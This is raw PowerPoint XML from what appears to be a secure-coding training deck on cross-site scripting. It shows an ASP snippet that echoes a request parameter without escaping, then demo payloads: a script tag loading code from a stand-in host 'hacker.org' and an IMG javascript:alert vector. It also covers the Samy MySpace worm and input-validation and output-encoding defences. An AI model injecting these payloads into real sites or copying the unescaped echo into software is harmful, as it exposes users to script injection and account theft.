                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/P&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121865" y="3289440"/>
            <a:ext cx="7924800" cy="2818954"/>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r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC=http://hacker.org/malicious.js /&gt;</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Label: &lt;SCRIPT SRC=http://hacker.org/malicious.js /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;/P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49"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98020" y="1113295"/>
            <a:ext cx="8153400" cy="1846053"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strLabel</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"label"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>); </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;P&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Label: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strLabel</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t/>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/P&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121865" y="3289440"/>
            <a:ext cx="7924800" cy="2818954"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('XSS')/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Label: &lt;IMG SRC=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('XSS') /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;/P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3245774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53"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XSS Injection – Exploit Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399728" y="5280936"/>
            <a:ext cx="6327373" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Actual usage by a threat actor will not be this obvious…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="399728" y="3604536"/>
            <a:ext cx="3714750" cy="1266825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="399728" y="2156736"/>
            <a:ext cx="7262813" cy="1104120"/>
            <a:chOff x="990600" y="2514600"/>
            <a:chExt cx="7262813" cy="1104120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="990600" y="2514600"/>
              <a:ext cx="7262813" cy="1104120"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3124200"/>
              <a:ext cx="3505200" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050"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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="1089936"/>
            <a:ext cx="6172200" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4352" y="442893"/>
            <a:ext cx="81534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Real World – Myspace &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is my hero</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1644546"/>
            <a:ext cx="3733800" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1 hour: 1 new friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>8 hours: 222 new friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>13 hours: 8803 new friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>18 hours: 1,005,831 new friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4019564" y="1559067"/>
            <a:ext cx="5105400" cy="3175559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="166345" y="4293096"/>
            <a:ext cx="3810000" cy="1517330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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8100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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349" y="1066800"/>
            <a:ext cx="7696200" cy="50371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1200"/>
              </a:spcAft>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Validate input  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(only accept characters that make sense)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Encode output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(escape characters like "&lt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML encode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL encode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="36998" y="3061873"/>
            <a:ext cx="8433261" cy="2971802"/>
            <a:chOff x="378810" y="3061875"/>
            <a:chExt cx="8153400" cy="2971802"/>
